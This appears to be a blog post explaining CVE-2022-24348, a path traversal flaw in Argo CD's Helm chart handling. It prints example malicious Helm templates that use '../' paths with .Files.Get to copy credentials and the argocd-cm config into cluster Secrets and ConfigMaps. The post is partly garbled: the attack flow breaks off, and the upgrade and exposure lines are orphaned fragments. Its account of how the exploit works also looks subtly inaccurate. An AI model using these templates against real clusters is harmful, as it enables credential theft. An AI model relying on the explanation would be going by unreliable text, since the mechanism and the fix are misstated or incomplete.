If you use Argo CD to manage your Kubernetes applications, your secrets might have been at risk. In this post, we’ll break down the CVE-2022-24348 vulnerability, show how it works, and explain what you need to do to fix it. We’ll keep it simple and practical, with real code and links to dig deeper.
🚨 What is CVE-2022-24348?
CVE-2022-24348 is a directory traversal vulnerability in Argo CD, a popular Kubernetes GitOps tool. Specifically, versions before 2.1.9 and 2.2.x before 2.2.4 are affected.
Because of a problem in the helmTemplate function inside the repository.go file, an attacker can use Helm chart requests to read files outside their intended directories. This includes stuff like sensitive YAML files that might hold credentials.
In plain English: Someone with access to Argo CD could trick it into reading files it really shouldn’t.
⚠️ How Does the Attack Work?
Argo CD lets you deploy applications using Helm charts from various repositories. When fetching a chart, it runs a helm template command. The bug lets a malicious chart contain paths that use ../ ("dot-dot") to move up directories, escaping the expected folder.
The Core Bug
In repository.go, the helmTemplate function does not securely clean user-supplied paths before passing them to disk. This means a chart could reference another file on the server, not just files inside its own repo.
Here’s how a malicious chart reference looks
# Imagine this is inside templates/bad.yaml in a malicious Helm chart
apiVersion: v1
kind: Secret
metadata:
name: stolen-secret
data:
creds: {{ .Files.Get "../secrets/admin-creds.yaml" | b64enc }}
What it does:
- Uses Helm’s .Files.Get templating helper to fetch ../secrets/admin-creds.yaml.
- If the file exists outside the chart, Argo CD will read it and put its contents into a new secret named stolen-secret.
Here’s a high-level exploitation flow
1. Attacker crafts Helm chart that tries to read files using ../ path tricks.
2. Attacker uploads chart to a location (could be a public repo, or in some cases, a Git repo connected to Argo CD).
Exploit Code Example
You can test this vulnerability with a Helm chart like the one above.
Let’s go deeper. Here’s a chart that tries to grab the Argo CD admin config (for demonstration)
apiVersion: v1
kind: ConfigMap
metadata:
name: admin-creds
data:
creds: |-
{{ .Files.Get "../argocd-cm.yaml" }}
If argocd-cm.yaml contains Admin passwords and is in a folder one level above the chart, this template will read it and put it right into your cluster!
🔎 Digging Into the Code
In repository.go (before the patch), user input isn’t sanitized:
func helmTemplate(chartPath string, ...) error {
// chartPath is used directly, can contain ../
helmCmd := exec.Command("helm", "template", chartPath, ...)
...
}
The fix (see PR 7583) adds path sanitization, preventing escapes:
func secureJoin(base, target string) (string, error) {
...
}
If you are using 2.2.x, go to at least 2.2.4.
> See the security advisory from Argo CD.
Especially shared or multi-user Argo CD setups
- Anyone who accepts charts or app definitions from untrusted sources (public repos, PRs from unknown contributors, etc.)
🔗 References
- CVE-2022-24348 in NIST NVD
- Argo CD Security Advisory GHSA-wc56-mwvg-8g9v
- Patch Commit on GitHub
- Helm Docs: .Files.Get
📝 Wrap-up
CVE-2022-24348 is a classic directory traversal bug with a modern cloud twist. If you use Argo CD, make sure you’re patched. Review your RBAC and be careful with Helm charts from outside your team—someone could use this trick to grab secrets and configurations you thought were safe.
Stay updated and always check the audit logs for abnormal resource creation.
Got questions? Join the Argo CD community or check out the GitHub issue tracker for more info.
*If you found this post helpful, share it with your team! Secure GitOps keeps your clusters safe and your secrets yours.*
Timeline
Published on: 02/04/2022 21:15:00 UTC
Last modified on: 02/09/2022 13:53:00 UTC